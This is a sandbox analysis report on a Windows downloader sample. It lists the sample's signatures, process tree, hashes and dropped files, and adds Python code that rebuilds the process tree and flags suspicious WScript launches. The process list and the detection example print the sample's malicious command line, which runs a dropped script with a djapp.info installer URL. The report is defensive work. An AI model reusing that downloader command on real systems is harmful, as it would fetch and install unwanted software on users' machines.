Windows 7 deprecation: Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel:  119s
max time network: 120s
platform:         windows7_x64
resource:         win7-20240903-en
resource tags:    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted:        13/10/2024, 10:32
Static task:      static1
Behavioral task:  behavioral1
Sample:           3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
Resource:         win7-20240903-en
General
Target: 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
Size:   184KB
MD5:    3f5936f8c4c1416eb39b4c3f5335c20c
SHA1:   3f82a1f53548fdddfa6aa54862f37fb3bab0c1ea
SHA256: 1575aef9498b17365cfd11088dd585b4a14b056b7c43abc6a5c83389fd87e572
SHA512: ad0725153fa1c232640e62734e5b72454053a282378a0777d9e233b5b25104fabdbfbdbdac28385a0ed12e64d5c7d4d7288c034492a160c24ae5c69927990110
SSDEEP: 3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndnS
Malware Config
Signatures

Blocklisted process makes network request (11 IoCs)
flow  pid   Process
6     2796  WScript.exe
8     2796  WScript.exe
10    2796  WScript.exe
12    3016  WScript.exe
13    3016  WScript.exe
15    1608  WScript.exe
17    1608  WScript.exe
19    2992  WScript.exe
20    2992  WScript.exe
22    2280  WScript.exe
23    2280  WScript.exe

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
pid   pid_target  Process       procid_target
1620  2684        WerFault.exe  29

System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Note that every WScript.exe instance opens this key, not only the sample: ordinary locale initialisation reads it too, so this signature is weak evidence on its own.

Suspicious use of WriteProcessMemory (24 IoCs)
Each row below appears four times in the report (the "rows" column). procid_target is Triage's internal index of the target process, not a Windows PID: the sample itself is index 29 (see the Program crash row), its children are indices 30, 32, 34, 36, 38 and 41.
description                       pid   Process                                             procid_target  rows
PID 2684 wrote to memory of 2796  2684  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  30             4
PID 2684 wrote to memory of 3016  2684  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  32             4
PID 2684 wrote to memory of 1608  2684  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  34             4
PID 2684 wrote to memory of 2992  2684  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  36             4
PID 2684 wrote to memory of 2280  2684  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  38             4
PID 2684 wrote to memory of 1620  2684  3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  41             4
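The three IoC tables above are flat rows, and the relationships (which process wrote into which, which of those then talked to the network, and which one reported the crash) only become obvious once they are joined on PID. The following Python is an added example, not code from this report or from Triage: it rebuilds the tree from the rows as they appear above, counts the WriteProcessMemory entries per child, and annotates each child with its network flows and crash report. The row strings are copied from the tables; their one-row-per-string layout and column order are the editor's reading of the flattened text, not a documented export format.

```python
"""Rebuild the process tree from the report's signature tables.

Added example, not code from the original report or from Triage. The row
strings are copied from the three tables above; the one-row-per-string
layout and the column order are the editor's reading of the flattened
text, not a documented export format.
"""
import re
from collections import Counter, defaultdict

SAMPLE = "3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe"

# 'Suspicious use of WriteProcessMemory': description, pid, Process, procid_target.
# The report lists each of the six children four times, hence range(4).
WPM_ROWS = [
    f"PID 2684 wrote to memory of {child} 2684 {SAMPLE} {procid}"
    for child, procid in [(2796, 30), (3016, 32), (1608, 34),
                          (2992, 36), (2280, 38), (1620, 41)]
    for _ in range(4)
]
# 'Blocklisted process makes network request': flow, pid, Process.
NET_ROWS = [
    "6 2796 WScript.exe", "8 2796 WScript.exe", "10 2796 WScript.exe",
    "12 3016 WScript.exe", "13 3016 WScript.exe",
    "15 1608 WScript.exe", "17 1608 WScript.exe",
    "19 2992 WScript.exe", "20 2992 WScript.exe",
    "22 2280 WScript.exe", "23 2280 WScript.exe",
]
# 'Program crash': pid, pid_target, Process, procid_target.
CRASH_ROWS = ["1620 2684 WerFault.exe 29"]

WPM_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) (\d+) (\S+) (\d+)$")
NET_RE = re.compile(r"^(\d+) (\d+) (\S+)$")
CRASH_RE = re.compile(r"^(\d+) (\d+) (\S+) (\d+)$")


def build_tree(wpm_rows, net_rows, crash_rows):
    """Join the three tables on PID.

    Returns a dict with: children {parent: [(child, write_count), ...]},
    flows {pid: [flow ids]}, crashes {werfault_pid: crashed_pid} and
    images {pid: image name}.
    """
    writes = Counter()
    images = {}
    for row in wpm_rows:
        m = WPM_RE.match(row)
        if not m:
            raise ValueError(f"unrecognised WriteProcessMemory row: {row!r}")
        src, dst, pid, image, _procid = m.groups()
        if src != pid:   # the description and the pid column must agree
            raise ValueError(f"pid mismatch in row: {row!r}")
        writes[(int(src), int(dst))] += 1
        images[int(src)] = image
    children = defaultdict(list)
    for (parent, child), n in writes.items():   # insertion order = report order
        children[parent].append((child, n))

    flows = defaultdict(list)
    for row in net_rows:
        flow, pid, image = NET_RE.match(row).groups()
        flows[int(pid)].append(int(flow))
        images[int(pid)] = image

    crashes = {}
    for row in crash_rows:
        pid, target, image, _procid = CRASH_RE.match(row).groups()
        crashes[int(pid)] = int(target)
        images[int(pid)] = image

    return {"children": dict(children), "flows": dict(flows),
            "crashes": crashes, "images": images}


def root_pid(tree):
    """The process that wrote into others but was never written into."""
    targets = {c for kids in tree["children"].values() for c, _ in kids}
    roots = [p for p in tree["children"] if p not in targets]
    if len(roots) != 1:
        raise ValueError(f"expected one root, found {roots}")
    return roots[0]


def summarize(tree):
    """The numbers a triager wants before reading the process list."""
    root = root_pid(tree)
    kids = tree["children"][root]
    return {
        "root": root,
        "children": [c for c, _ in kids],
        "networked": [c for c, _ in kids if c in tree["flows"]],
        "crash_reporters": [c for c, _ in kids if c in tree["crashes"]],
        # The same write count for every child is what process creation itself
        # produces; one child with far more writes than its siblings is the
        # case to examine for injection.
        "uniform_write_count": len({n for _, n in kids}) == 1,
    }


def render(tree, pid=None, depth=0, writes=None):
    """Indented text tree, one line per process, with annotations."""
    pid = root_pid(tree) if pid is None else pid
    notes = []
    if writes is not None:
        notes.append(f"{writes}x WriteProcessMemory from parent")
    if pid in tree["flows"]:
        notes.append(f"network flows {tree['flows'][pid]}")
    if pid in tree["crashes"]:
        notes.append(f"WER report for pid {tree['crashes'][pid]}")
    line = "  " * depth + f"{pid} {tree['images'].get(pid, '?')}"
    lines = [line + (f"  [{'; '.join(notes)}]" if notes else "")]
    for child, n in tree["children"].get(pid, []):
        lines.extend(render(tree, child, depth + 1, n))
    return lines


if __name__ == "__main__":
    print("\n".join(render(build_tree(WPM_ROWS, NET_ROWS, CRASH_ROWS))))
```

Run stand-alone it prints the annotated tree: PID 2684 at the root, five WScript.exe children each with two or three network flows, and WerFault.exe 1620 reporting the crash of 2684. The `uniform_write_count` flag is the reason for counting the rows at all: every child receives the same four writes from the parent, which is the pattern plain process creation leaves behind, whereas a single child receiving many more writes than its siblings would be the one to examine for injection.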
Processes

C:\Users\Admin\AppData\Local\Temp\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe  (PID 2684)
  Command line: "C:\Users\Admin\AppData\Local\Temp\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WScript.exe  (PID 2796)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WScript.exe  (PID 3016)
    Command line: identical to PID 2796
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WScript.exe  (PID 1608)
    Command line: identical to PID 2796
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WScript.exe  (PID 2992)
    Command line: identical to PID 2796
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WScript.exe  (PID 2280)
    Command line: identical to PID 2796
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WerFault.exe  (PID 1620)
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 184
    - Program crash

Three things to take from the tree. First, the sample runs under WoW64: it asks for C:\Windows\System32\WScript.exe, but the process that actually starts is C:\Windows\SysWOW64\WScript.exe, because file-system redirection maps System32 to SysWOW64 for 32-bit callers, and the WerFault.exe that reports its crash is the SysWOW64 one as well; a detection keyed on the full image path has to match both. Second, it launches the same script five times with identical arguments: a dropped fuf74F1.js in its own %TEMP% directory, a URL on www.djapp.info whose query parameters (domain, dotnet, file=installer, ip, pub_id, setup_id, srcid) read like those of a pay-per-install downloader, and the path of a fuf74F1.exe in the same directory. What the script does with those arguments, and whether that .exe was written, is not recorded on this page. Third, the parent itself crashes and is reported by WerFault.exe (-p 2684), so the run ends with the sample gone and only the script children having touched the network.
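The command lines above are the part of this report that carries over to a detection rule: a script host started by an executable in a user-writable directory, with a script under AppData, a URL and an .exe path as its arguments. The following Python is an added example, not the report's or Triage's code. It runs a small set of checks over constructed process-creation records (dicts with Image, ParentImage and CommandLine fields, modelled on the fields of a Sysmon process-creation event); the first record is PID 2796 from this report, the other two are constructed controls. It also splits the URL's query into fields so that pub_id, setup_id and srcid can be pivoted on.

```python
"""Flag the script-host pattern seen in the process list above.

Added example, not the report's or Triage's code. EVENTS are constructed
dicts modelled on a process-creation record (Image, ParentImage,
CommandLine); the first is the WScript.exe line from this report, the
other two are constructed controls.
"""
import ntpath
import re
import shlex
import urllib.parse

SAMPLE_DIR = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = r"\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe"
C2_URL = ("http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer"
          "&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6"
          "qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5A"
          "osQUy-wm7otAI4nS08rUofZzdt")

EVENTS = [
    {   # PID 2796 from the report
        "Image": r"C:\Windows\SysWOW64\WScript.exe",
        "ParentImage": SAMPLE_DIR + SAMPLE,
        "CommandLine": (r'"C:\Windows\System32\WScript.exe" "' + SAMPLE_DIR
                        + r'\fuf74F1.js" ' + C2_URL + " " + SAMPLE_DIR + r"\fuf74F1.exe"),
    },
    {   # constructed benign control: a logon script started by Explorer
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Scripts\map_drives.vbs"',
    },
    {   # PID 1620 from the report: not a script host, so never flagged
        "Image": r"C:\Windows\SysWOW64\WerFault.exe",
        "ParentImage": SAMPLE_DIR + SAMPLE,
        "CommandLine": r"C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 184",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)
URL_RE = re.compile(r"^https?://", re.I)


def split_cmdline(cmdline):
    """Windows-style split: whitespace separates, double quotes group, no escapes."""
    lex = shlex.shlex(cmdline, posix=False)
    lex.whitespace_split = True
    lex.commenters = ""          # a '#' inside a URL is not a comment
    try:
        toks = list(lex)
    except ValueError:           # unbalanced quote: fall back to a plain split
        toks = cmdline.split()
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t for t in toks]


def analyse(event):
    """Return the findings for one event; an empty list means nothing to flag."""
    if ntpath.basename(event["Image"]).lower() not in SCRIPT_HOSTS:
        return []
    args = split_cmdline(event["CommandLine"])[1:]
    scripts = [a for a in args if ntpath.splitext(a)[1].lower() in SCRIPT_EXTS]
    findings = []
    if any(USER_WRITABLE.match(s) for s in scripts):
        findings.append("script_in_appdata")
    if any(URL_RE.match(a) for a in args):
        findings.append("url_as_script_argument")
    if any(a.lower().endswith(".exe") and USER_WRITABLE.match(a) for a in args):
        findings.append("appdata_exe_as_script_argument")
    if USER_WRITABLE.match(event["ParentImage"]):
        findings.append("parent_in_appdata")
    return findings


def url_fields(url):
    """Break the query string into the fields a triager would pivot on."""
    parts = urllib.parse.urlsplit(url)
    query = urllib.parse.parse_qs(parts.query, keep_blank_values=True)
    return {"host": parts.hostname, **{k: v[0] for k, v in query.items()}}


def scan(events):
    """{index: findings} for every event that produced at least one finding."""
    return {i: f for i, e in enumerate(events) if (f := analyse(e))}


if __name__ == "__main__":
    for i, findings in scan(EVENTS).items():
        print(i, findings)
    print(url_fields(C2_URL))
```

The image check uses the basename only, so it matches both C:\Windows\System32\WScript.exe and the redirected C:\Windows\SysWOW64\WScript.exe that actually ran here. The command line is split the Windows way (double quotes group, backslashes are literal) rather than with POSIX rules, which would have eaten the backslashes in every path; the benign control, a script outside AppData started by Explorer with no URL argument, produces no finding at all.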
Network
MITRE ATT&CK Enterprise v15
Downloads

The entries under CryptnetUrlCache are CryptoAPI's cache of certificate-revocation and issuer fetches; the entries under Content.IE5 are WinINet's response cache, which is consistent with the script's HTTP request going through a WinINet-backed client. Both domain_profile[1].htm paths are listed twice with different hashes, i.e. each file was rewritten during the run. Entries without a path are listed as the report shows them.

Filesize: 1KB
MD5:    67e486b2f148a3fca863728242b6273e
SHA1:   452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256: facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512: d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Filesize: 436B
MD5:    971c514f84bba0785f80aa1c23edfd79
SHA1:   732acea710a87530c6b08ecdf32a110d254a54c8
SHA256: f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512: 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize: 174B
MD5:    3cf1dd99bd0c2838a8033354b70fb158
SHA1:   6d896ae4b40bdc30ee264f39bb5c4088ef6ac0e6
SHA256: fb1a03bbf5a8cf7c6861729b3ffc215698fe92392be72d25fa8a4f21931339f9
SHA512: 7900536b78d87a586f37005d4035da51069cac520c653b8a9c506589718dea3c53a982756f3de72ba2443b556d5084b1776f15c7717d7bbea8b733970e02c88c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5:    ec1e73330cfda39925084459eedf146a
SHA1:   ce1319b98100d0a50def60568ac5be70d0f28dde
SHA256: 9f2291db3ceb9ac6e6df43045973fee22b109396767ee054aa276c1927b4dc76
SHA512: 59c6e62a3a22de4bb0f1c7ae14268e4db91ae9e5c3d82f071bcd6eed205c1fbe6b24d243ff921f6c95339e3d36bc15a64acea34ab73b58697982dd62e32e832f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize: 170B
MD5:    3ade44fac3c2777d0ab82c8830374924
SHA1:   29699a73110a6c30ca8434c8c88f8a663d03442f
SHA256: 82129e25f198238dd735ca3ca678cc4a84390218df58bccfb812344109216490
SHA512: de89b5657e26494830cbfe275d3dfbe20809ac0fac071081d90d6de1664a8d5807d414721e74abe9251ddc7109a556a05a780f563eafbf831f359453857531a2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm
Filesize: 6KB
MD5:    7f739f3c76b77c71158ae6004e35e1df
SHA1:   d5bfd67d8cd437fe0b8caef12ab21d901c8a678b
SHA256: f98aed0674e594d91809b73553b8cda22b1d642f63bf4adbb49637a1e6b08951
SHA512: a0bf2f7f0a4b6ac1c1fc5fc27bcffa516f90b42d6b2224d46528dea3b7d4e137fc2ed9976e0c179cf678cb5ef334950e889cb66b2ff943f10db223b259a09f4f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm
Filesize: 6KB
MD5:    81a752c472df96994b8178a56d757591
SHA1:   dd11b977434a83c2a72396f5c73b99de55012964
SHA256: e101e495d76c572cf17f88642476975e8acd26e7fb44a76324c2cff250be42c1
SHA512: b992a773e66ee5ff105e6812315e7819c34d3ac55814b95e169c71be00d218fafe7571ba02a287c42be8c46e02d5c375b8987bc26dedff9d753d7ed942e70c51

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm
Filesize: 40KB
MD5:    c2901b4bf8907cd6b3b2a41348e38750
SHA1:   94ce57047880d8c1384cab66872bb741a7e85733
SHA256: e0a6b70cefdc692a7f0cf774602df4863101dd0e8dff274c0f2a17fa13e1ea27
SHA512: 7d02263052add9ce1a90bb92588d1ba75c7f97bb072b2359d97f729bcf1e11659edf618495c22c1bbbb376d326dab3a8e040a2b30c7f7e97c8a100256903c60c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm
Filesize: 40KB
MD5:    63975738acc68c6d79c5b405dab79073
SHA1:   ecc73f5abde424e9c8937f199184910c1159d870
SHA256: 852cd59298282829affb6d77064dd96a8db186c807913b0d0d53cffebb4a5534
SHA512: 27bf3ade0d40599efa813fe30e03f981d888caf8b576b3c5a6f9e8033180a16a8014a34ed66b85f8faad4ffbdb5057c2badcd162a0d27aba324035f270dde553

Filesize: 70KB
MD5:    49aebf8cbd62d92ac215b2923fb1b9f5
SHA1:   1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Filesize: 181KB
MD5:    4ea6026cf93ec6338144661bf1202cd1
SHA1:   a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Filesize: 3KB
MD5:    3813cab188d1de6f92f8b82c2059991b
SHA1:   4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256: a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512: 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Filesize: 175B
MD5:    85d9d388549f2749f02907219d310334
SHA1:   051d0fb52f817bcbc9b4bc62339205e826a62b09
SHA256: 89d3052b24efff2ff417934fa89976bf2f04336c03d8e0a2f4208e47a46ccd3b
SHA512: 24569673e068a5685c1acb68f1d90d7891ad586bda977d4a51636f6265985763a2dc46ceae4b98f3a9c2a214b975f7f2ffc27c273b22ff3a49a1883b8faf5ce7